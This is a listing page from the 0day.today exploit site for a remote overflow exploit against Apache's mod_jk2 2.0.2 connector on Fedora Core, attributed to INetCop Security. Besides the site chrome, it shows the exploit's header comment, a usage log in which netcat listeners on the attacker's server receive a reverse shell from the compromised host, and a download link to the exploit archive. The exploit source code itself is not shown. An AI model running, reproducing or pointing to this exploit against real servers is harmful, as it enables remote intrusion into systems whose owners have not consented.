0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Apache Tomcat Connector jk2-2.0.2 (mod_jk2) Remote Overflow Exploit
[=================================================================== Apache Tomcat Connector jk2-2.0.2 (mod_jk2) Remote Overflow Exploit =================================================================== /* ** ** Fedora Core 6,7,8 (exec-shield) based ** Apache Tomcat Connector jk2-2.0.2(mod_jk2) remote overflow exploit ** by INetCop Security ** ** Advanced exploitation in exec-shield (Fedora Core case study) ** ** IOActive Security Advisory: ** http://www.securityfocus.com/archive/1/487983 ** ** Heretic2(heretic2x@gmail.com)'s exploit (Win32): ** http://inj3ct0r.com/exploits/9172 ** ** -- ** exploit by INetCop Security. */ /* ** -- ** $ ./0x82-apache-mod_jk2 61.xx.xx.20 80 61.xx.xx.30 ** ** Fedora Core release 6 (exec-shield) based ** Apache Tomcat Connector (mod_jk2) remote overflow exploit ** Target Version: Apache/2.0.53 (Unix) mod_jk2/2.0.2 ** by INetCop Security ** ** + make socket ** + make exploit payload ** + try connected 61.42.25.22:80 ** + exploit send! ** * attacker host, check it up, now! :-D ** ** $ ** -- ** ** attacker's server port 56789: -- ** $ nc -l -p 56789 -vv ** listening on [any] 56789 ... ** 61.xx.xx.20: inverse host lookup failed: Unknown host ** connect to [61.xx.xx.30] from (UNKNOWN) [61.xx.xx.20] 47576 ** id ** -- ** ** attacker's server port 5678: -- ** $ nc -l -p 5678 -vv ** listening on [any] 5678 ... ** 61.xx.xx.20: inverse host lookup failed: Unknown host ** connect to [61.xx.xx.30] from (UNKNOWN) [61.xx.xx.20] 52452 ** uid=99(nobody) gid=4294967295 groups=4294967295 context=root:system_r:unconfined_t:s0-s0:c0.c1023 ** -- ** */ http://inj3ct0r.com/sploits/9177.tar.gz # 0day.today [2024-11-16] #